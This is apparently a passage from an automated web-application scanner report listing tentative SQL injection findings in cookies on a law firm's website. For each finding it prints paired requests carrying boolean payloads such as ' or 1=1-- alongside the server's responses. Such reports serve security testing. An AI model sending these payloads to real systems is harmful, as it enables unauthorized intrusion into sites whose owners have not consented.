Path:   /scripts/images/arrows-default.png

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 10291203'%20or%201%3d1--%20 and 10291203'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.210291203'%20or%201%3d1--%20; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:10:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Wed, 12-May-2010 16:10:44 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.210291203'%20or%201%3d2--%20; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:10:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.89. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utmb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 19736969'%20or%201%3d1--%20 and 19736969'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.130521654019736969'%20or%201%3d1--%20; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:12:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Wed, 12-May-2010 16:12:12 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.130521654019736969'%20or%201%3d2--%20; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:12:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.90. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 11204199%20or%201%3d1--%20 and 11204199%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=24928704611204199%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:12:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Wed, 12-May-2010 16:12:18 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=24928704611204199%20or%201%3d2--%20

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:12:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.91. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 17691360'%20or%201%3d1--%20 and 17691360'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman17691360'%20or%201%3d1--%20; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:10:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Wed, 12-May-2010 16:10:51 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman17691360'%20or%201%3d2--%20; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:10:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.92. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hsfirstvisit cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The hsfirstvisit cookie appears to be vulnerable to SQL injection attacks. The payloads 90477653'%20or%201%3d1--%20 and 90477653'%20or%201%3d2--%20 were each submitted in the hsfirstvisit cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4690477653'%20or%201%3d1--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HSFIRSTVISIT=;expires=Wed, 12-May-2010 16:11:29 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4690477653'%20or%201%3d2--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

